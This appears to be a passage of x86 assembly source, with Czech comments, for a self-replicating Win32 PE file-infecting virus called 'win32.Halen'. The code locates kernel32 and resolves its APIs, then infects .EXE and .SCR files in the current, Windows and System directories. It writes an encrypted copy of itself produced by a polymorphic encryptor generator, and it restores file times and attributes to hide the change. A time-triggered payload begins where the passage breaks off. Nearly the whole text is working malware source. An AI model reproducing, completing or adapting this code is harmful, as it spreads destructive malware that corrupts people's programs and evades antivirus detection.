;Potom je z techto dat vytvarena bud encrypt rutina nebo decrypt rutina (viz vyse)
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű A TADY JE TEN BROUCEK Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
.386p
.model flat
extrn ExitProcess:proc
extrn MessageBoxA:proc
.data
FGMessage db 'This is win32.Halen, a PE infector created by pxR[MIONS]',0h
FGTitle db 'win32.Halen',0
.code
debug equ 1 ;!!!!!!
Start:
cld ;
call OffsetTrick ;Starej dobrej offset trik
OffsetTrick: pop ebp ;
sub ebp,offset OffsetTrick ;
pushad ;Ulozit registry (pro pripad chyby)
lea eax,[ebp+offset ExceptHndl] ;EAX=VA obsluhy chyby
push eax ;
push dword ptr fs:[0] ;
mov dword ptr fs:[0],esp ;Nastavit SEH frame
mov eax,[ebp+offset origIP] ;
mov [ebp+offset retIP],eax ;
mov esi,[esp+28h] ;Odkud jsme byli volani?
and esi,0FFFF0000h ;Zaokrouhlit na Page
mov ecx,6h ;Opakovat max. 5 krat
GetK01: dec ecx ;Dec pocitadlo
jz Return2Host ;5. pokus?
cmp word ptr [esi],'ZM' ;Byla nalezena MZ signatura?
jz GetK02 ;yo!
GetK03: sub esi,10000h ;Ne -> zkusime predchozi Page
jmp GetK01 ;Opakujeme
GetK02: mov edi,esi ;
mov edx,esi ;Uschovat nalezenou VA kernelu
add edi,[esi+3Ch] ;Posunem na zacatek PE headeru
cmp word ptr [edi],'EP' ;Je to PE ?
jz GetKOK ;yo -> mame kernel
jmp GetK03 ;ne -> hledame dal
ExceptHndl: ;
mov esp,[esp+8] ;Obnovit puvodni ESP
Return2Host: ;
pop dword ptr fs:[0] ;Obnovit SEH frame
add esp,4 ;Jeste ESP
popad ;Registry
cmp ebp,0 ;Prvni generace viru?
je VirusEnd ;yo -> ukaz dialog
lea ebx,[ebp+offset Start] ;Vypocet originalni startIP
sub ebx,[ebp+offset retIP] ;
jmp ebx ;Navrat k hostiteli
retIP dd ? ;
GetKOK: ;
xchg esi,edi ;
mov [ebp+offset K32VA],edi ;Ulozime nalezenou VA kernelu
mov esi,[esi+78h] ;ESI=RVA na export table kernelu
add esi,edi ;Prevedem RVA na VA
add esi,18h ;
lodsd ;Number of Exported Names
mov [ebp+offset K32EOMax],eax ;Ulozit
lodsd ;Export Adress Table RVA
add eax,edi ;RVA na VA
mov [ebp+offset K32EAT],eax ;Ulozit
lodsd ;Export Name Pointers Table RVA
add eax,edi ;RVA na VA
mov [ebp+offset K32ENPT],eax ;Ulozit
lodsd ;Export Ordinals RVA
add eax,edi ;RVA na VA
mov [ebp+offset K32EO],eax ;Ulozit
lea esi,[ebp+offset APITableStr] ;ESI=VA jmena prvni hledane API
lea edi,[ebp+offset APITableVA] ;EDI=VA tabulky VA API
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű HLEDANI API FUNKCI Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
FindAllAPIs:
lodsb ;AL=delka nazvu API
cmp al,0 ;Konec?
je FindAPIsOK ;yo -> hotovka
movzx ecx,al ;ECX=AL
push edi ;Uschovat EDI
call FindAPIVA ;Hledat API!
xchg esi,edi ;ESI<->EDI :)
pop edi ;Obnovit EDI
test eax,eax ;API nenalezena (chyba)
jz Return2Host ;Navrat do hostitele
stosd ;Ulozit nalezenou VA do tabulky
jmp FindAllAPIs ;Hledat dalsi
FindAPIVA: ;Vstupni parametry:
xchg edi,esi ; -esi=VA API jmena
mov esi,[ebp+offset K32ENPT] ; -ecx=delka API jmena
xor edx,edx ;Vynulovat pocitadlo
FindAPI00: ;ESI=Export Name Pointer Table VA
lodsd ;EAX=API name RVA
add eax,[ebp+offset K32VA] ;RVA na VA
push esi ;Uschovat registry
push edi ;
push ecx ;
push edx ;
xchg eax,esi ;
rep cmpsb ;Porovnat s nalezenym jmenem
pop edx ;Obnovit registry
pop ecx ;
pop edi ;
pop esi ;
jz FindAPI01 ;100% shodne -> nalezeno
inc edx ;Neshoduji se -> inc Pocitadlo
cmp edx,[ebp+offset K32EOMax] ;Prozkouseny vsechny Export. names?
jae APINotFnd ;yo -> chyba
jmp FindAPI00 ;Zkusit dalsi nazev
FindAPI01: ;
shl edx,1 ;EDX=EDX*2
mov esi,[ebp+offset K32EO] ;
add esi,edx ;ESI=offset K32EO+EDX
xor eax,eax ;EAX=0 :)
lodsw ;EAX=API ordinal
shl eax,2 ;EAX=EAX*4
mov esi,[ebp+offset K32EAT] ;
add esi,eax ;ESI=offset K32EAT+EAX
lodsd ;EAX=RVA k API
add eax,[ebp+offset K32VA] ;RVA na VA
add edi,ecx ;EDI posunem na dalsi nazev API
ret ;Hotovo!
APINotFnd: xor eax,eax ;Nenalezeno -> EAX=0
ret ;Zpet
FindAPIsOK: ;
call PayLoad ;Pust payload
if debug ;Pokud je debug=1 budem infikovat
lea esi,[ebp+testFName] ;jen soubor test.exe
call InfectCurrDir ;Infikuj aktualni adresar
jmp Return2Host ;Navrat do hostitele
endif ;
lea eax,[ebp+offset origDir] ;Ulozime si aktualni adresar
push eax ;
push eax ;
push 128h ;Max delka cesty
call [ebp+offset GetCurrentDirectoryAVA];Zjistit aktualni adresar
lea ebx,[ebp+offset currDir] ;
mov eax,[ebp+offset GetWindowsDirectoryAVA] ;Budeme menit adresar na WINDOWS
call ISCh ;Zmenit adresar & infikovat
mov eax,[ebp+offset GetSystemDirectoryAVA] ;Ted na WINDOWS\SYSTEM
call ISCh ;Zmenit adresar & infikovat
call [ebp+offset SetCurrentDirectoryAVA] ;Vratime puvodni adresar
call ISCurr ;A infikujem soubory v nem
jmp Return2Host ;Navrat do hostitele
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű INFEKCE ADRESARE Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
ISCh:
push 128h ;Maximalni delka
push ebx ;VA nazvu adresare
call eax ;Zjistit nazev (viz vyse)
push ebx ;
call [ebp+offset SetCurrentDirectoryAVA] ;Zmenit adresar
ISCurr: ;
push ebx ;Uschovat pointer na nazev adresare
lea esi,[ebp+offset exeMask] ;Soubory *.EXE
call InfectCurrDir ;Infikuj aktualni adresar
lea esi,[ebp+offset scrMask] ;Soubory *.SCR
call InfectCurrDir ;Infikuj aktualni adresar
pop ebx ;Vytahnout pointer
ret ;Hotovka
InfectCurrDir: ;
mov byte ptr [ebp+offset infCounter],3h ;Nastavit pocitadlo souboru
lea eax,[ebp+offset FSearch] ;EAX=offset Search record
push eax ;
push esi ;
call [ebp+offset FindFirstFileAVA] ;Najit prvni odpovidajici soubor
inc eax ;Chyba ?
jz ICD01 ;
dec eax ;Ne
mov edx,eax ;Ulozit Handle
ICD00: ;
test eax,eax ;Nalezen soubor?
jz ICD01 ;Ne -> konec
xchg eax,edx ;Uschovat Handle
lea esi,[ebp+offset FSearch.FName] ;
push eax ;Uschovat registry
push esi ;
call InfectFile ;Infikovat nalezenej soubor
pop edi ;Obnovit registry
pop eax ;
test esi,esi ;Je pocitadlo nulovy? (viz nize)
jz ICD01 ;yo -> konec
push eax ;Uschovat handle
lea ebx,[ebp+offset FSearch] ;
push ebx ;
push eax ;
call [ebp+offset FindNextFileAVA] ;Najit dalsi soubor
pop edx ;Obnovit handle
jmp ICD00 ;A zas od zacatku!
ICD01: ;
ret ;Infekce adresare hotova!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű INFIKACE SOUBORU Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
InfectFile: ;
mov eax,[ebp+offset FSearch.FSizeL] ;Zkontrolujem velikost souboru
cmp eax,4096 ;
jb InfError ;Mensi nez 4096B -> konec
cmp eax,5000000 ;
ja InfError ;Vetsi nez cca 5MB -> konec
push 00000080h ;80h='any file' atribut
push esi ;ESI=VA na jmeno souboru
call [ebp+offset SetFileAttributesAVA] ;Nastavit atributy souboru
inc eax ;
jz InfError ;Chyba?
xor eax,eax ;EAX=0
push eax ;Template handle (vzdy 0)
push eax ;Atributy
push 00000003h ;Open type (3 pro existujici soubor)
push eax ;Security option
inc eax ;
push eax ;Sharing mode (vzdy 1)
push 0C0000000h ;Access mode (80000000+40000000)
push esi ;^(generic read/write)^
call [ebp+offset CreateFileAVA] ;Otevrit soubor
inc eax ;
jz RetAttr ;Chyba?
dec eax ;EAX=Handle otevrenyho souboru
mov [ebp+offset IFHandle],eax ;Ulozit
mov ecx,VirSize ;ECX=Delka viru (vcetne dat)
add ecx,[ebp+offset FSearch.FSizeL] ;ECX=ECX+delka souboru
add ecx,1000h ;plus nejaky misto :)
mov [ebp+offset mapMem],ecx ;Ulozit
xor eax,eax ;
push eax ;Filename handle (vzdy 0)
push ecx ;Maximum size (ECX)
push eax ;Minimum size (0)
push 00000004h ;Page access rights (4 pro R/W)
push eax ;Security attributes (vzdy 0)
push dword ptr [ebp+offset IFHandle] ;Handle otevrenyho souboru
call [ebp+offset CreateFileMappingAVA] ;Alokovat pamet
cmp eax,0 ;Nezadarilo se?
je RetAttr ;
mov [ebp+offset IMHandle],eax ;Ulozit map handle
push dword ptr [ebp+offset mapMem] ;Kolik mapovat
push 00000000h ;File offset high (0) \ kam mapovat
push 00000000h ;File offset low (0) /
push 00000002h ;Map access mode (2 pro write)
push eax ;Map handle
call [ebp+offset MapViewOfFileVA] ;Zavolat API
cmp eax,0 ;Vloudila se chybicka?
je CloseMap ;
xchg esi,eax ;ESI=adresa kam se to namapovalo
lodsw ;EAX=prvni 2 byty souboru
sub esi,2 ;Vratime ESI do puvodniho stavu
mov [ebp+offset mapView],esi ;Uschovat adresu
cmp ax,'ZM' ;MZ signatura
jne UnmapView ;Ne -> neni to EXE -> pryc!
mov eax,esi ;
add esi,[esi+3ch] ;Posunem se na zacatek PE hlavicky
push esi ;Schovat
sub esi,eax ;
cmp esi,[ebp+FSearch.FSizeL] ;Ukazuje ESI mimo rozsah souboru?
pop esi ;Obnovit
ja UnmapView ;yo -> pryc!!!
cmp word ptr [esi],'EP' ;Je to PE?
jne UnmapView ;Ne -> shit!
cmp dword ptr [esi+4ch],'NLAH' ;Znacka zavirovaneho souboru
je UnmapView ;Uz je zavirovan -> pryc
mov eax,[esi+28h] ;
mov [ebp+offset origIP],eax ;Uschovat originalni IP
mov eax,[esi+3ch] ;
mov [ebp+offset fileAlign],eax ;A taky FileAlign
mov ebx,[esi+74h] ;EBX=pocet zaznamu v DataDir. array
shl ebx,3 ;EBX=EBX*8
movzx ecx,word ptr [esi+6h] ;ECX=pocet sekci v PE souboru
dec ecx ;Jednu odectem
mov eax,28h ;
mul ecx ;EAX=EAX*ECX
add eax,ebx ;
add eax,78h ;78h je konec PE hlavicky
add eax,esi ;EDI ted ukazuje na Section header
xchg eax,edi ;posledni sekce
mov ecx,[ebp+offset FSearch.FSizeL] ;ECX=delka souboru
mov ebx,[edi+14h] ;EDX=offset dat posledni sekce
sub ecx,ebx ;ECX-EDX (velikost sekce)
cmp ecx,[edi+8h] ;Porovnat s velikosti v headeru
jb IGoOn ;Je mensi -> OK
mov [edi+8h],ecx ;Vetsi -> upravime
add [esi+1ch],ecx ;Upravit Size of code
add [esi+50h],ecx ;Upravit Image size
IGoOn: ;
mov dword ptr [esi+4ch],'NLAH' ;Nastavit znacku
or [edi+24h],0A0000020h ;Nastavime flags sekce (R/W/Code)
mov eax,[edi+8h] ;EAX=virtualni velikost sekce
push eax ;Uschovat
add eax,VirSize ;EAX=EAX+delka viru vcetne dat
mov ebx,[ebp+offset fileAlign] ;EBX=File align
push eax ;Uschovat
div ebx ;EAX=EAX DIV EBX, EDX=EAX MOD EBX
pop eax ;Obnovit
sub ebx,edx ;FileAlign-EDX
mov [edi+8h],eax ;Nova Virtual size
add eax,ebx ;
mov [edi+10h],eax ;Nova Size of Raw Data
pop eax ;Obnovit
mov ebx,[edi+0ch] ;EBX=Virtual address
add ebx,eax ;EBX=EBX+stara virtualni velikost
mov [esi+28h],ebx ;Ulozit novou vstupni IP
mov edx,[ebp+offset origIP] ;EDX=originalni vstupni IP
sub ebx,edx ;EBX=rozdil mezi starou a novou IP
mov [ebp+offset origIP],ebx ;Ulozit
mov ecx,VirSize ;ECX=delka viru
add ecx,255 ;Plus nejaky misto
add [esi+50h],ecx ;Pridat k Image size
add [esi+1ch],ecx ;Pridat k Size of code
mov edx,[edi+14h] ;EDX=ukazatel na data sekce (v souboru)
add edx,eax ;(EAX=puvodni virt. velikost sekce)
add edx,[ebp+offset mapView] ;EDX=EDX+VA zacatku obrazu souboru
xchg edi,edx ;EDI<->EDX ;)
lea esi,[ebp+Start] ;ESI=VA zacatku tela viru
mov ecx,offset CodeEnd-offset Start ;ECX=delka viru (bez datovyho prostoru)
call EncryptVirus ;Zakodovat a zkopirovat telo
dec edi ;
sub edi,[ebp+offset mapView] ;EDI=EDI-VA zacatku obrazu souboru
mov [ebp+offset FSearch.FSizeL],edi ;Ulozit novou delku souboru
dec byte ptr [ebp+offset infCounter] ;Snizit pocitadlo infekce
jnz UnmapView ;Pokud neni nula jdeme dal
xor esi,esi ;Jinak ESI=0
UnmapView: ;
push dword ptr [ebp+offset mapView] ;VA obrazu souboru v pameti
call [ebp+offset UnmapViewOfFileVA] ;
CloseMap: ;
push dword ptr [ebp+offset IMHandle] ;
call [ebp+offset CloseHandleVA] ;Uzavreme map handle
RetTime: ;
lea eax,[ebp+offset FSearch.CrTime] ;EAX=VA puvidniho casu souboru
push eax ;Creation time
add eax,16 ;
push eax ;Last write time
sub eax,8 ;
push eax ;Last access time
push dword ptr [ebp+IFHandle] ;Handle souboru
call [ebp+offset SetFileTimeVA] ;Nastavime puvodni casy
xor eax,eax ;
push eax ;How2Move=0 (Od zacatku souboru)
push eax ;Vzdalenost high (vzdy 0)
push dword ptr [ebp+offset FSearch.FSizeL] ;Vzdalenost low
push dword ptr [ebp+offset IFHandle] ;Handle souboru
call [ebp+offset SetFilePointerVA] ;Nastavime ukazatel souboru
push dword ptr [ebp+offset IFHandle] ;Handle souboru
call [ebp+offset SetEndOfFileVA] ;Uriznem soubor
push dword ptr [ebp+offset IFHandle] ;Handle souboru
call [ebp+offset CloseHandleVA] ;Zavrem soubor
RetAttr: ;
push dword ptr [ebp+offset FSearch.FAttr] ;VA atributu souboru
lea eax,[ebp+offset FSearch.FName] ;EAX=VA jmena souboru
push eax ;
call [ebp+offset SetFileAttributesAVA] ;Nastavit puvodni atributy
InfError: ret ;Hotovo!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű KODOVANI VIRU Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
EncryptVirus: ;
push esi ;Uschovat registry
push edi ;
push ecx ;
lea eax,[ebp+offset CryptData] ;EAX=VA pole dat
call BuildCryptData ;Vytvorime data pro de/en krypt. rutinu
xor ebx,ebx ;EBX=0
mov bl,[ebp+offset CryptSize] ;Pocet instrukci v crypt rutine
add ebx,36 ;Plus nejaky init instrukce
add [ebp+offset origIP],ebx ;Upravime rozdil IP
mov edi,[esp+4] ;Obnovime ulozeny EDI
mov ebx,offset CodeEnd-offset Start+1 ;EBX=kolik toho budem kodovat
xor edx,edx ;
inc edx ;EDX=1 (encrypt)
call CreateCrypt ;Vytvorit encrypt rutinu (na VA EDI)
pop ecx ;Obnovit registry
pop edi ;
pop esi ;
shr ecx,2 ;ECX=ECX DIV 4 (kodujem po DWORDech)
inc ecx ;+1
push edi ;Schovat EDI
xor ebx,ebx ;
mov bl,byte ptr [ebp+offset CryptSize] ;EBX=Delka vsech kodovacich instrukci
add ebx,36 ;Plus init instrukce
push edi ;Schovat
add edi,ebx ;EDI=EDI+EBX (tam budem ukladat
pop ebx ;zakodovana data)
EV00: lodsd ;EAX=data k zakodovani
push ebx ;Uschovat registry
push ecx ;
call ebx ;Zavolat vytvorenou kodovaci rutinu
pop ecx ;EAX=zakodovana data
pop ebx ;Obnovit registry
stosd ;Ulozit EAX
dec ecx ;Snizit pocitadlo
jnz EV00 ;Hotovo?
pop eax ;EAX=puvodni EDI (kam sme zacali ukladat)
push edi ;Uschovat EDI (konec zak. tela)
xchg eax,edi ;Prohodit
mov ebx,offset CodeEnd-offset Start+1 ;EBX=code size
xor edx,edx ;EDX=0 (decrypt)
call CreateCrypt ;Vytvorit decrypt rutinu (na VA EDI)
pop edi ;Obnovit EDI
ret ;Hotovo!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű GENEROVANI DE/ENCRYPT RUTIN Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
CreateCrypt: ;EDX=0 pro decrypt, 1 pro encrypt
push ebx ;Schovat (EBX=kolik bytu de/kodujem)
lea esi,[ebp+offset CryptData] ;ESI=VA nagenerovanych dat
mov ebx,1 ;Nastavime pocitadlo
test edx,edx ;Decrypt ?
jnz CC00 ;Ne -> pokracujem na CC00
lea esi,[ebp+offset DecryptStart] ;yo -> zkopirujem init instrukce
movsd ;Pretahnout 2xDWORD
movsd ;
xor eax,eax ;
mov al,byte ptr [ebp+offset CryptSize] ;EAX=delka vsech de/encrypt intrukci
add eax,31 ;Plus delka init instrukci
stosd ;Ulozime pozici odkud se dekoduje
movsd ;A pretahnem zbytek init instrukci
movsw ;
mov bl,byte ptr [ebp+offset CryptNr] ;Nastavime pocitadlo
call NI ;Nastav ESI na posledni crypt instr.
add esi,3h ;Pridej jeji delku
add esi,ecx ; -||-
CC00: movsw ;Pretahni pocatecni nebo
CC01: ;koncovy XCHG (zalezi na EDX)
call NI ;Nastav ESI na BLtou crypt instr.
movsb ;Pretahni prvni byte instrukce
add esi,edx ;Encrypt nebo decrypt registr
movsb ;Pretahni ho
test edx,edx ;Pokud tvorime decrypt musime
jnz CC06 ;upravit ESI
inc esi ;!!! V ECX je delka instrukce-2!!!
CC06: movsb ;Pretahni dalsi byte instrukce
dec ecx ;Zkopirovano vse?
jnz CC06 ;Ne -> val dal
test edx,edx ;Decrypt?
jnz CC02 ;Nee -> CC02
dec bl ;Sniz pocitadlo
jz CC05 ;Vsechny instr. zkopirovany?
jmp CC01 ;ne -> Opakujem pro dalsi instr.
CC02: inc bl ;Zvys pocitadlo
cmp bl,byte ptr [ebp+offset CryptNr] ;Vsechny instr. zkopirovany?
ja CC05 ;yo -> konec
jmp CC01 ;ne -> opakujem
CC05: ;
pop eax ;Obnov (push EBX na zacatku)
test edx,edx ;Decrypt?
jnz CC03 ;Ne -> zkopiruj RET a konec
lea esi,[ebp+offset CryptData] ;Zkopiruj XCHG
movsw ;
lea esi,[ebp+offset DecryptEnd] ;Zkopiruj koncove instrukce (CMP)
movsd ;
shr eax,2 ;EAX=EAX DIV 4
inc eax ;+1
stosd ;Uloz hodnotu k CMP
movsw ;Pretahni intr. JNE
mov eax,0FFFFFFFAh ;
xor ebx,ebx ;
mov bl,byte ptr [ebp+offset CryptSize] ;EBX=delka crypt instrukci
add ebx,13 ;Plus init
sub eax,ebx ;Vypocet skoku JNE
stosd ;Uloz to
jmp CC04 ;Hotovo
CC03: mov bl,byte ptr [ebp+offset CryptNr] ;Pro encrypt prethnem jen XCHG
call NI ;Nastav ESI na posledni istrukci
add esi,3h ;
add esi,ecx ;Posun ESI za ni
movsw ;Pretahni ten XCHG
mov eax,0c3h ;EAX=0C3h (RET)
stosb ;Uloz
CC04: ret ;Hotovo
NI: ;
push eax ;Neznicit EAX!
lea esi,[ebp+offset CryptData+2] ;Nastav ESI na 1. istrukci
xor bh,bh ;Nuluj pocitadlo
NI00: ;
xor ecx,ecx ;ECX=0 ;)
lodsb ;AL=1 byte instrukce
cmp al,81h ;Je to 6 bytova instrukce?
jne NI01 ;
add esi,3h ;ESI=ESI+3
add ecx,3h ;ECX=3
NI01: add esi,3h ;ESI=ESI+3
add ecx,1h ;ECX=ECX+1
inc bh ;Zvys pocitadlo
cmp bh,bl ;Hledana instrukce?
jne NI00 ;Ne -> opakuj!
NI02: sub esi,ecx ;Nastav ESI na zac. instrukce
sub esi,3h ;
pop eax ;Obnov EAX
ret ;Zpet!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű GENEROVANI DAT PRO DE/ENCRYPT RUTINY Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
BuildCryptData:
mov byte ptr [ebp+offset CryptNr],0 ;Nuluj fsechna pocitadla!!! ;)
mov byte ptr [ebp+offset CryptSize],0 ;
call [ebp+offset GetTickCountVA] ;Init nahodnejch cisel
xor eax,65432h ;
mov [ebp+offset RandomNr],eax ;
call Random ;Furt init
lea edi,[ebp+offset CryptData] ;EDI=pocatek pole crypt dat
mov eax,4h ;Vygeneruj nahodny cislo
call Random ;mensi nez EAX
mov ebx,eax ;EBX=EAX (pracovni registr)
mov eax,87h ;Instrukce XCHG EAX,prac.reg.
stosb ;
mov eax,0c0h ;
add eax,ebx ;
stosb ;Az sem
mov eax,100 ;Zvol nahodnou delku rutiny
call Random ;
mov [ebp+offset CDRandom],eax ;a uloz ji
BCD00: ;
mov eax,6h ;Nahodne zvol instrukci
call Random ;
cmp eax,0 ;Je to XCHG ?
jnz BCD01 ;Ne -> jdi dal
mov eax,87h ;
stosb ;Uloz 1. byte (87h)
mov eax,4h ;Musime zmenit prac. registr
call Random ;Nahodne zvolime
push eax ;Uschovat
mov ecx,8 ;
mul ecx ;EAX=EAX*8
add eax,0C0h ;
add eax,ebx ;Plus puvodni
pop ebx ;EBX=novy prac. registr
stosb ;Uloz vypocitanou hodnotu (decrypt)
stosb ;Pro encrypt je stejna
mov eax,90h ;
stosb ;Dopln na 3 bytovou instrukci (NOP)
add byte ptr [ebp+offset CryptSize],3h ;Zvys pocitadlo
jmp BCD04 ;
BCD01: ;
cmp eax,3h ;Je to ADD, SUB nebo XOR?
ja BCD03 ;Ne -> jdi dal
push eax ;Schovat
mov eax,3h ;
call Random ;Zvol zpusob operace
mov ecx,eax ;Schovat do ECX !!!!!
add eax,81h ;Pricti zaklad
stosb ;Uloz 1. byte instrukce
pop eax ;Obnovit EAX (typ instrukce)
dec eax ;-1
jz BCD05 ;Je to ADD?
std ;Ne -> STD
cmp eax,2 ;Je to XOR?
jne BCD06 ;Ne -> jdi dal
BCD05: cld ;Pro XOR nebo ADD
BCD06:
lea esi,[ebp+offset ASXInstr] ;ESI=tabulka zakladu registru
add esi,eax ;ESI=ESI+typ instrukce (0 az 2)
lodsb ;Natahni pro decrypt
xchg eax,edx ;EDX<->EAX
lodsb ;Natahni pro encrypt
cld ;Vrat zpet smer
add eax,ebx ;Prictem prac. reg.
stosb ;Ulozime pro decrypt
xchg eax,edx ;EDX<->EAX ;)
add eax,ebx ;Prictem prac. reg.
stosb ;Ulozime pro encrypt
add byte ptr [ebp+offset CryptSize],3h ;Zvys pocitadlo
test ecx,ecx ;Je to 6 bytova instr. (ECX viz nahore)
jnz BCD02 ;Ne -> preskoc
mov eax,0FFFFFFFFh ;Vygenerujem 4 bytovou hodnotu
call Random ;
stosd ;A ulozime
add byte ptr [ebp+offset CryptSize],3h ;Zvysit pocitadlo
jmp BCD04 ;JMP!
BCD02: mov eax,0100h ;Vygen. 1 bytovou hodnotu
call Random ;
stosb ;Ulozit
jmp BCD04 ;JMP! :)
ASXInstr: db 0C0h,0E8h,0F0h,0F0h ;Tabula zakladu registru pro instr. ADD, SUB, XOR, XOR
BCD03:
push eax ;Instrukce ROR nebo ROL
mov eax,2h ;
call Random ;Nahodna hodnota
add eax,0C0h ;1. byte instrukce
stosb ;Ulozit
pop eax ;Obnovit EAX (typ instrukce)
xchg eax,ecx ;EAX<->ECX
mov eax,0c0h ;Zaklad pro decrypt
mov edx,0c8h ;Zaklad pro encrypt
add eax,ebx ;+ prac. reg.
add edx,ebx ;+ prac. reg.
sub ecx,4 ;ECX-4
jz BCD07 ;Je to ROL?
xchg eax,edx ;Ne -> prohod EAX<->EDX
BCD07: stosb ;Uloz hodnotu pro decrypt
xchg eax,edx ;EAX<->EDX
stosb ;Uloz hodnotu pro encrypt
mov eax,100h ;
call Random ;Nahodna hodnota
stosb ;Ulozit
add byte ptr [ebp+offset CryptSize],3h ;Zvys pocitadlo
BCD04: ;
inc byte ptr [ebp+offset CryptNr] ;Zvys pocitadlo poctu instrukci
lea eax,[ebp+offset CryptData+212] ;EAX=maximalni delka instrukci
sub eax,[ebp+offset CDRandom] ;Odecteme (vygenerovano vyse)
cmp edi,eax ;Jsme na konci?
jb BCD00 ;Ne -> vygeneruj dalsi instrukci
mov eax,87h ;Konec -> umistime XCHG
stosb ;1. byte
mov eax,8h ;
mul ebx ;EAX=EAX*prac.reg.
add eax,0c0h ;EAX+0C0h
stosb ;Ulozit
ret ;Hotovo!
CDRandom: dd ?
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű GENEROVANI NAHODNYCH CISEL - VERY STUPID CODE Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
Random: ;Tohle je generator nah. cisel
push edx ;Je tak debilni, ze to ani nebudu
push ecx ;komentovat
xchg eax,ecx ;Vstup: EAX=cislo
mov eax,[ebp+offset RandomNr] ;Vystup: EAX=nah. cislo mensi nez
mov edx,87654321h ; vstupni EAX a vetsi nez 0
mul edx ;
xor eax,12345678h ;
mov [ebp+offset RandomNr],eax ;
mov edx,eax ;
rol edx,8 ;
push eax ;
jmp Rnd01 ;
Rnd00: pop eax ;
shr eax,1 ;
shr edx,1 ;
xor eax,edx ;
push eax ;
and eax,edx ;
test eax,eax ;
jz Rnd01 ;
dec eax ;
Rnd01: cmp eax,ecx ;
jae Rnd00 ;
pop ecx ;
pop ecx ;
pop edx ;
ret ;Hotovo!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű !!!!!!!!! PAYLOAD !!!!!!!! Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
PayLoad: ;Payload (moje oblibena cast)
lea eax,[ebp+offset FSearch] ;Data budeme ukladat do Search recordu
push eax ;protoze uz ho nepotrebujem
push eax ;
call [ebp+offset GetSystemTimeVA] ;Zjistime systemovy cas
pop esi ;ESI=VA FSearch
cmp word ptr [esi+4],06 ;Sobota?
jne NoPL ;Ne -> :(
cmp word ptr [esi+8],19 ;19 hod. ?
jne NoPL ;Ne -> :(
lea eax,[ebp+offset gdi] ;
push eax ;VA jmena knihovny
call [ebp+offset LoadLibraryAVA] ;Natahneme knihovnu gdi32.dll
xchg eax,edx ;EDX=VA knihovny v pameti
lea esi,[ebp+offset BitBltS] ;ESI=VA prvniho API nazvu
call FindPLAPIs ;Najdi adresu API funkci
